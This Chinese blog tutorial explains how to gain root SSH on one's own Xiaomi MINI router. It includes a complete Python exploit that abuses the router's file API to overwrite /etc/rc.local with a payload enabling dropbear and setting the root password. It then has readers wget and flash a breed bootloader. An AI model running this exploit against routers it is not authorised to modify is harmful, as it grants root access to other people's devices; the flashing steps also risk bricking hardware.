小米MINI破解SSH教程

By | 2018-11-27

本教程来自: http://coolrc.me/2016/07/23/23131543/

只是原作者有些地方的说明对于小白来讲比较难明白,所以才有该教程出现,望指教!

一、准备工作
1)一台ubuntu或者Linux系统的电脑  [本人推荐ubuntu]
2)小米MINI旧版本开发版固件 [2.7.11开发版]   点击下载
3)小米MINI breed 刷不死固件,日后刷机无忧了。 点击下载
breed也可能在破解ssh后进入路由器再直接下载

二、在ubuntu上进行以下操作
1)安装 apt-get install pythone3 python3-pip,支持python语言
2)在/home下新建mini.py文件,文件内容为:

#!/bin/python3
import requests
import time
def main():
    Session = input("Paste your session here: ")
    #Session = '1387acc0547bc5188bc22bb811b2db9c'
    print('++++++++++++++++++++++++++++++++++++++++++++++++++')
    print('+          MiRouter OpenSSH exploit              +')
    print('+    Codez by dadadazhiliao,QQ:271607603         +')
    print('++++++++++++++++++++++++++++++++++++++++++++++++++')
    print("Prepare hacking your MiRouter")
    time.sleep(3)
    upload(Session, 'payload', '/extdisks/sda1')
    #print ('payload on the way.')
    for i in range(1,10):
        print('>'*i,'payload on the way',end='\r')
        time.sleep(0.3)
    filemv(Session, '/etc/rc.local', '/etc/rc.local.bak')
    for i in range(11,15):
        print('>'*i,'exploit it                ',end='\r')
        time.sleep(0.3)
    filecp(Session, '/extdisks/sda1/payload', '/etc/')
    for i in range(16,20):
        print('>'*i,'exploit it                ',end='\r')
        time.sleep(0.3)
    filemv(Session, '/etc/payload', '/etc/rc.local')
    for i in range(21,25):
        print('>'*i,'exploit it                ',end='\r')
        time.sleep(0.3)
    filerm(Session, '/extdisks/sda1/payload')
    print('>'*26,'done                ')
    print('Reboot your Router and get the ssh,enjoy :)')
    #filerm(Session, '/userdisk/data/payload')
def upload(Session,file,fpath):
    MiUrl = 'http://192.168.31.1/upload?stok=' + Session + '&secret=' + Session + '&target=' + fpath + '&targetRootPath=/'
    files = {'file': ('payload', open(file, 'rb'), 'application/octet-stream', {'Expires': '0'})}
    req = requests.post(url = MiUrl, files = files)
    #print (req.content)

def filemv(Session,mfile,dist):
    MiUrl = 'http://192.168.31.1/cgi-bin/luci/;stok=' + Session + '/api/xqdatacenter/request'
    data = {"payload":'{"api":50,"source":"' + mfile + '","target":"' + dist + '","token":"' + Session +'"}'}
    req = requests.post(MiUrl, data=data)
    #print (req.content)

def filecp(Session,mfile,distdir):
    MiUrl = 'http://192.168.31.1/cgi-bin/luci/;stok=' + Session + '/api/xqdatacenter/request'
    data = {"payload":'{"api":4,"source":"' + mfile + '","target":"' + distdir + '","token":"' + Session +'"}'}
    req = requests.post(MiUrl, data=data)
    #print (req.content)
def filerm(Session,dfile):
    MiUrl = 'http://192.168.31.1/cgi-bin/luci/;stok=' + Session + '/api/xqdatacenter/request'
    data = {"payload":'{"api":2,"path":"' + dfile + '","token":"' + Session +'"}'}
    req = requests.post(MiUrl, data=data)
    #print (req.content)
if __name__ == '__main__':
    main()
    exit()
#End

然后给于运行权限, 执行 chmod +x mini.py

再新建一个名为 payload 文件,文件内容如下:

# restore phy config
speed=$(uci -q get xiaoqiang.common.WAN_SPEED)
[ -n "$speed" ] && /usr/sbin/phyhelper swan "$speed"
sed -i ":x;N;s/if \[.*\; then\n.*return 0\n.*fi/#hehe/;b x" /etc/init.d/dropbear
/etc/init.d/dropbear start
pwd=password
(echo $pwd; sleep 1; echo $pwd) | passwd root
exit 0

其中的 password 要换成你路由器的管理密码,即登入 http://192.168.31.1 时的密码,密码必须一致

三、刷入2.7.11开发版
这里刷入固件的流程不表,如果不会的话可能上网查一下相关教程。[原作者要求恢复出厂设置以及刷完旧版本固件后插上一个U盘,我操作的时候这两点都没有执行,也不明白原作者用意,所以各位自行判断吧!]

刷完旧版固件需要完成‘设置向导’,这里需要抄下 stok= 后的值一串数字,可以在浏览器地址栏里找到这行[例如:]
http://192.168.31.1/cgi-bin/luci/;stok=cc920253aacf785d13c6795b8464dbb7/web/setting/upgrade
要抄的就是这串数字 ‘cc920253aacf785d13c6795b8464dbb7

四、进行ssh破解
在ubuntu 上进行以下操作

cd /home
python3 mini.py

Paste your session here: <– 这里输入上面抄下的 stok 值

然后就会自动进行ssh 破解,破解成功会出现以下信息:

++++++++++++++++++++++++++++++++++++++++++++++++++
+ MiRouter OpenSSH exploit +
+ Codez by dadadazhiliao,QQ:271607603 +
++++++++++++++++++++++++++++++++++++++++++++++++++
Prepare hacking your MiRouter
>>>>>>>>>>>>>>>>>>>>>>>>>> done
Reboot your Router and get the ssh,enjoy 🙂

这时候重启路由器就行了!现在路由器的root密码就是你刚才第二步里的password,即路由器管理密码。

五、写入 breed 刷不死固件
用putty或者其他ssh客户端登入路由器   [现时已经有root的密码了,当然能登入了]
执行以下命令:

cd /tmp
wget http://breed.hackpascal.net/breed-mt7620-xiaomi-mini.bin
mtd -r write /tmp/breed-mt7620-xiaomi-mini.bin Bootloader

如果你是pandorabox 或者 openwrt 再想写入 breed 是不行的,一定要先刷到dd-wrt再写入breed,dd-wrt写入命令如下:[当然是在dd-wrt环境下写入]

mtd -r write /tmp/breed-mt7620-xiaomi-mini.bin u-boot


测试breed是否已经写入成功
路由器关电,顶着reset键开机,直到蓝灯持续闪烁松开reset.
breed 的默认IP地址为 192.168.1.1  ,电脑端如何处理这里不用再讲了吧?如果这个不会的话我相信以上内容你也不明白了,本人建议你放弃这份教程了!!!以免造成不必要的损失。

本教程完结!!!

發佈回覆